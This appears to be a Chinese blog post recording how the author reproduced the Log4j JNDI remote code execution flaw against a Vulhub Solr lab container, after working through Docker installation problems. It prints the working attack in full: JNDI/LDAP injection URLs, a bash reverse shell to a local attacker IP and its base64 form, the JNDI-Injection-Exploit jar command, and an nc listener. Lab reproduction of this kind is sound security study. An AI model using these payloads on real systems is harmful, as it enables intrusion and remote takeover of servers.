LOG4介绍
是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布
log4j存在远程代码执行漏洞、受影响版本2.x
部署环境
攻击机环境:192.168.3.180
kail环境:192.168.203.12【NAT转换的】
部署vluhub
具体流程参考其他博主,本文主要讲解在部署vluhub过程中存在的几个问题,作为记录
问题一、apt-get install docker docker-compose,执行失败,下载失败,修改外网下载也失败
获取离线安装包
直通车
Releases · docker/compose · GitHub
具体版本

下载后存储至

赋予执行权限
sudo chmod +x /usr/local/bin/docker-compose
查看版本docker-compose -v

问题二、
wget https://github.com/vulhub/vulhub/archive/master.zip下载失败
手动下载https://github.com/vulhub/vulhub/archive/master.zip
上传解压
unzip vulhub-master.zip
cd vulhub-master

问题三、docker compose up -d执行失败
由于修改vluhub外网导致,需要切换成国内网络

修改内容如下

重启服务

再次执行 docker compose up -d


端口8983搭建成功

地址访问
http://192.168.203.12:8983/solr/admin/cores?action=1

验证是否存在漏洞

替换发送请求
[http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}](http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn} "http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}")
刷新dns右边这个按钮 出现下方内容则存在
bash -i >& /dev/tcp/192.168.3.180/6666 0>&1

反向getshell base64编码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==
获取JNDI包
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

执行
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.3.180
生成获取ldap内容 有用
创建监听nc-lvvp 6666异常由于windwos 没有安装nc需要安装
直通车

安装后火绒会报毒,运行
然后在该路径下执行 nc-lvvp 6666

将生成ldap内容复制替换,重新刷新一下接口
[http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}](http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z} "http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}")
getshell了

大概就是这么个流程!
哦 最后一步移除环境
docker-compose down
参考:
centos离线安装docker,docker-compose_centos离线安装docker-compose-CSDN博客